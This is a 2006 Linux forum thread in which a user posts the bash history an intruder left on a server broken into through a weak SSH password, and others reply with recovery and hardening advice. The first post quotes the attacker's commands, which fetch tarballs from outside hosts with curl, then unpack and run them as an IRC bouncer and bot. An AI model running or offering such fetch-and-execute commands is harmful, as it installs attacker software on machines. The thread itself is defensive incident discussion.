Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here. |
Notices |
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
Are you new to LinuxQuestions.org? Visit the following links:
Site Howto |
Site FAQ |
Sitemap |
Register Now
If you have any problems with the registration process or your account login, please contact us. If you need to reset your password, click here.
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Get a virtual cloud desktop with the Linux distro that you want in less than five minutes with Shells! With over 10 pre-installed distros to choose from, the worry-free installation life is here! Whether you are a digital nomad or just looking for flexibility, Shells can put your Linux machine on the device that you want to use.
Exclusive for LQ members, get up to 45% off per month. Click here for more info.
|
|
06-19-2006, 08:22 AM
|
#1
|
Member
Registered: Jan 2005
Posts: 40
Rep:
|
machine break in
ok i found out one of my boxes was hacked over the weekend, found this is the bash history - any ideas? the file they downloaded an ran is some kind of irc bouner.
w
/sbin/ifconfig |grep inet
cat /etc/hosts
passwd
cd ..
cd ..
cd ..
cd /var/tmp
cd ..
cd ..
cd tmp
tar xzvf psydrawin.tar.gz
cd psybnc
chmod +x *
make
./psybnc
cd ..
curl -O www.channel.as.ro/psyd.tar.gz
tar xzvf psyd.tar.gz
cd psybnc
./psybnc
cd ..
curl -O atac.uv.ro/DFL
tar xzvf DFL
cd .virtual
chmod +x *
./darwin
|
|
|
06-19-2006, 09:04 AM
|
#2
|
Member
Registered: Jul 2005
Location: England, UK
Distribution: Ubuntu 8.04 Server, Kubuntu 12.04
Posts: 698
Rep:
|
looks like it defiantly some kind of IRC bot.
|
|
|
06-19-2006, 09:05 AM
|
#3
|
Member
Registered: Mar 2004
Posts: 135
Rep:
|
Do you know how he get in?
|
|
|
06-19-2006, 09:22 AM
|
#4
|
Member
Registered: Jan 2005
Posts: 40
Original Poster
Rep:
|
yep ssh - i only started here last week and only found out this server let's jst say 3 letter username (very common protocol) with matching password!!! - tottally stupid password and username there
|
|
|
06-21-2006, 03:18 AM
|
#5
|
Member
Registered: Apr 2006
Location: Finland
Distribution: Ubuntu, Gentoo, Debian
Posts: 88
Rep:
|
You should unplug your network cable. Then they surely cant come back in.
And then run chkrootkit and rkhunter to check for possible rootkits. And change passwords.
Last edited by Fadoksi; 06-21-2006 at 03:21 AM.
|
|
|
06-21-2006, 11:30 AM
|
#6
|
Member
Registered: Jan 2005
Posts: 40
Original Poster
Rep:
|
ah i just shutdown the machine as soon as i found out, just culled the os and did a re-install with better passwrds
|
|
|
06-21-2006, 11:45 AM
|
#7
|
Member
Registered: Apr 2006
Location: Finland
Distribution: Ubuntu, Gentoo, Debian
Posts: 88
Rep:
|
Allright then. I hope you better luck this time
|
|
|
06-21-2006, 12:20 PM
|
#8
|
Moderator
Registered: May 2001
Posts: 29,415
|
re-install with better passwrds
Is better passes really *all* you did?
|
|
|
06-21-2006, 11:48 PM
|
#9
|
Member
Registered: Mar 2004
Posts: 135
Rep:
|
It is better than nothing.
|
|
|
06-22-2006, 02:20 AM
|
#10
|
Senior Member
Registered: Dec 2005
Location: Finland
Distribution: Slackware, CentOS, RHEL, OpenBSD
Posts: 1,006
Rep:
|
Have you checked the sshd_config file? Atleast make it more secure and delete all unnecessary services from running.
|
|
|
06-22-2006, 07:18 AM
|
#11
|
Member
Registered: May 2004
Location: Underground base in the mountains
Distribution: FreeBSD, Fedora, Ubuntu
Posts: 87
Rep:
|
Instead of using password authentication for your ssh use the private key authentication. It's more secure this way. If you are going to use a password remember to change your password frequently. You don't want another hacker to break into your computer.
|
|
|
06-22-2006, 07:36 AM
|
#12
|
Member
Registered: Aug 2005
Location: Midland, TX
Distribution: Ubuntu
Posts: 125
Rep:
|
I always set SSH to use only keys, to a fixed set of users, and I put it on a different port. NOT 22.
|
|
|
All times are GMT -5. The time now is 04:43 PM.
|
LinuxQuestions.org is looking for people interested in writing
Editorials, Articles, Reviews, and more. If you'd like to contribute
content, let us know.
|
Latest Threads
LQ News
|
|